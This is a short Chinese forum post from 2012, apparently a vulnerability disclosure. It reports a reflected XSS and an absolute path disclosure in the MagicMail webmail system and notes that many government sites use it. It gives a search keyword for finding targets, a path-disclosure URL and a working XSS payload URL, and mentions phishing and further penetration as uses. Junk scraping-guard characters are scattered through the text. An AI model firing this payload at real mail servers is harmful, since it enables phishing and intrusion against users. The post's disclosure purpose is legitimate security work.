今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞+ e1 `( i. m h1 X7 S
( v0 i2 {1 A1 n4 b) m
' _9 H9 e1 k6 e, R包含 一个反射性XSS 以及 绝对路径泄漏
# _" o8 v3 C: ~5 x$ D- W看了看 貌似全部是linux的。
8 U5 \7 e5 g; ^3 ^. B
6 l j9 l+ _1 u' p关键字:迈捷邮件系统 by MagicMail1 g* X( g% H* i9 @0 n5 o6 ?
. B7 ^( c) G$ ]) i- g% V' a) m
可以看到很多政府网站都用这个邮件系统
1 e0 X# S3 Q- z \
- G- r% j& u/ U1 d/ K" k绝对路径 http://madman.in/index.php?login_type=declare&language=
% g) J2 n# g: O3 E& U
4 M; I) c1 y' k- T2 r. H, p
. i9 v4 u. U& ~+ Y7 \
4 V( y0 m% Q- d7 t m. d+ A* WXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E' j8 u# c; o% |+ t0 q7 R. T4 V: X5 x
4 U9 S" D, i$ u. V0 G6 f
5 u% M6 g8 J9 t8 m# Z
7 L5 J+ U2 [/ B% Y# m+ M6 t虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等. \' `1 }' _* Q/ _- R7 G
) \3 z: [* C, F+ N0 M8 G V修复方案:看官方补丁吧。$ q- M! g9 `; X! Z- X
|
发表于 2012-11-9 20:38:41
收藏
支持
反对